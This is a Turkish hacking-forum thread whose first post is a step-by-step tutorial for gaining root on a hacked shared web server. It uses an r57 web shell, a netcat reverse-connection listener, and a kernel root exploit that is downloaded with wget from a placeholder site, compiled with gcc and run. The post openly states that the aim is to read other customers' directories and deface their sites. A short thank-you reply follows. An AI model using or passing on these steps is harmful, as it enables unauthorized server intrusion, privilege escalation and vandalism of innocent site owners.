THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Serverda Root Olma Bastan Sona

ayberk2 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2011
Nereden:
Bursa
Mesajlar:
480
Konular:
89
Teşekkür (Etti):
83
Teşekkür (Aldı):
51
Ticaret:
(0) %
29-05-2011 20:38
#1
Serverda Root Olma Bastan Sona
S.A.

Bu konumda sizlere serverda root olmayı gösterim...
Başlayalım...

Serverda root olmak için dikkat etçeğimiz en önemli konulardan birisi Safe Mod yani güvenlik modülünün OFF (kapalı) olması lazım... Aksi halde serverda root olamazsınız.Resmimize dikkat edelim.

Evet serverımızda Safe Mod : OFF ... Şimdi r57 shellin en üstünde yazan yere dikkat edelim. Burda Linux sürümünü vs.. göstermektedir... Resme bakalım :

Evet Linux 2.6.18.8 (2009) ... Sürümünü bulduk... Şimdi site ile bağlantı kurmamız lazım. Benim 443 nolu portum açıktı... Şimdi Başlat > Çalıştır diyelim ve nc -vv -l -p yazıp enterlayalım.

NOT : Netcat programı lazım ! Googledan arayarak indirebilirsiniz (:
Resme bakalım :

Enterladıktan sonra Ms-Dos ekranında Listening On Any (443) Yani 443 nolu portunuz şu anda dinlenmektedir yazısı çıkacaktır. Daha sonra r57 shellin altından 443 nolu portu dinleyelim... Resme bakalım :

Enterladıktan sonra ekranda şu yazı belircek

Bu 443 nolu portun dinlendiğini gösteriyor ... Ms-dos ekranına döndüğümüzde site hakkında bir takım bilgilerin çıktığını görüyoruz :

Yukarıdaki resimde sürümünü görmüştük. Ms-Dos ekranına da yansımış... Şu anda siteyle bağlantı kurduk. Sıra geldi root olma işlemine... Bizim sürümümüz 2.6.18.8 (2009) du ... Bu sürüme uygun exploitimizi siteye upload edelim ... Exploiti de google amcadan bulucaksınız.

Upload kısmından dosyayı sectikten sonra upload tusuna basarak root exploitinizi servera yükledik.

Ardından Ms-Dos ekranına şu komutu verelim

wget <a href= "http://xn--sitead-u9a.com/rootexploit.c" target="_blank">http://siteadı.com/rootexploit.c</a>
ve entera basalım. O site adını ve dosya adını kendinize göre değiştirceğinizi umarım biiliyorsunuzdur !
Şimdi resmi inceleyelim :

gcc -o root exploitinizinadı.c şeklinde komut verip entera basıyoruz... Ardından dosyaya chmod 777 yani tam yetki veriyoruz. Resme bakalım :

Son olarak ./root komutu verelim. İşlemimiz bu kadar ... Artık serverda root olduk... Resme bakalım :

Peki root olunca ne olucak ? ... Normalde /home/kullanıcıadı/public_html dizinini görüyorken , root olduktan sonra /home dizinin görebilcek ve diğer kullanıcıların sitelerinni deface edebilceksiniz. Umarım yararlı olmuşumdur.

Alıntıdır!
--------------------- Hacking Interface
Bilişimin Yeraltı Dünyasından__
Loscolinos Teşekkür etti.
pjx
pjx - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2011
Mesajlar:
164
Konular:
29
Teşekkür (Etti):
8
Teşekkür (Aldı):
7
Ticaret:
(0) %
19-07-2011 17:41
#2
teşekkürler
---------------------
veni vidi vici...acta est fabula...:inv

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler